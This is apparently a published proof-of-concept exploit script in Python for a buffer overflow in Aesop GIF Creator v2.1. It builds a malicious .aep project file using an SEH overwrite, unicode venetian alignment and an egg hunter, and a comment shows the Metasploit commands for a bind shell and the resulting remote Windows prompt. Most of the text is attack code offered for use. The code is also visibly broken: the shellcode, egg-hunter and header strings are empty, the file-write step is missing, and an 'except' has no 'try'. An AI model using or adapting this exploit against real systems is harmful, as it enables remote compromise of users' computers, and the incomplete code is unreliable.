# !/usr/bin/python
# Exploit Title: Aesop GIF Creator <= v2.1 (.aep) Buffer Overflow Exploit
# Date: 12/15/2010
# Author: xsploitedsec
# URL: http://www.x-sploited.com/
# Contact: xsploitedsec [at] x-sploited.com
# Software Link: http://www.yukudr.com/_h84561/aesop_setup.exe
# Vulnerable version: <= v2.1
# Tested on: Windows XP SP3 Eng
# CVE : N/A
#### Software Description:
# Aesop is a powerful tool that allows you to create animated GIF images (banners, buttons, labels and headings)
# for your website and even GIF wallpapers for your mobile phone quickly and easily (click to see samples). You
# can use an antialiased 3D-Text, shapes (rectangles, rounded rectangles, ellipses and polygons) and external
# pictures for drawing in your GIF.
# Convenient interface.
# Unicode support - you can use national characters as Text in your GIF.
# An excellent antialiasing technique (blurring the edges between color transitions) to draw 3D-Text and shapes:
#### Exploit information:
# Aesop is prone to a buffer overflow when handling a malicious aesop project files. The vulnerability
# is due to improper bounds checking of the "Picture=" field which can be exploited by malicious people to
# compromise a users system.
#### Other information:
# I attempted to reach out to the vendor about this but after a few short emails it became clear that they
# had no interest in verifying it/coordinating a fix so here's the exploit.
#### Notes:
# I always knew that one day I would end up needing to deal with unicode buffers. After a couple nights of
# tinkering around this is the end result. P.S. - When all else fails->Fail harder
#### Shoutz:
# kAoTiX, Sheep, Tu, edb-team, corelan team, packetstormsecurity and all other security researchers and sites.
# -> A big thanks goes to corelanc0d3r for shedding some light on the subject of unicode exploits. ;)
import struct
import sys
about = "\r\n==================================================================\n"
about +=" Title: Aesop GIF Creator <= v2.1 (.aep) Buffer Overflow Exploit PoC\n"
about +=" Author: xsploitedsec\n URL: http://www.x-sploited.com/\n"
about +=" Contact: xsploitedsecurity [at] x-sploited.com\n"
about +="=================================================================="
print about
# root@bt:~# msfpayload windows/shell_bind_tcp lport=4444 lhost= EXITFUNC=seh R
# | msfencode -e x86/alpha_upper -c 1 -t c -b '\x1a\x19\x0a' > /tmp/aesop.txt
# [*] x86/alpha_upper succeeded with size 752 (iteration=1)
# root@bt:~# ncat 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
# C:\>
# Unmolested, ASCII shellcode buried in stack ftw!?
bindshell = (
# unicode encoded, egg="w00t"
egg_hunter = (
# aesop project file header
prj_header = (
#hunter tag ="w00tw00t"
egg = "\x77\x30\x30\x74\x77\x30\x30\x74";
seh_offset = 669;
# Begin payload buffer
payload = "\x41" * seh_offset;
payload += "\x61";#popad
payload += "\x73";#nopalign/add byte ptr [ebx],dh
# SE handler
payload += "\xB1\x42";#unicode compatible p/p/r - Aesop.exe (universal)
# Prepare/jump->EAX
payload += "\x73";#venetian/add byte ptr [ebx],dh
payload += "\x55";#push ebp
payload += "\x73";#venetian/add byte ptr [ebx],dh
payload += "\x58";#pop eax
payload += "\x73";#venetian/add byte ptr [ebx],dh
payload += "\x05\x19\x11";#add eax, 0x19002200h
payload += "\x73";#venetian/add byte ptr [ebx],dh
payload += "\x2d\x11\x11";#sub eax, 0x12007200h
payload += "\x73";#venetian/add byte ptr [ebx],dh
payload += "\x50";#push eax
payload += "\x73";#add byte ptr [ebx],dh
payload += "\xc3";#ret
payload += "\x41" * 242;#align egghunter with->(ebp+650)
payload += egg_hunter;
payload += "\x41" * 1000; #give shellcode some breathing room
payload += egg;
payload += bindshell;
payload += "\x44" * (5000-len(payload)); #junk padding
# End payload buffer
xsploitme = (prj_header + payload);
print("\n[*] Creating file->xsploited.aep");
out_file = open("xsploited.aep",'w');
print("[+] xsploited.aep created successfully");
print("[*] 1. Launch the file or open it via Aesop.exe");
print("[*] 2. Wait a sec for egghunter and netcat in :)\n[-] Exiting...\r");
except (IOError):
print("[!] Error creating file\n[-] Exiting...\r");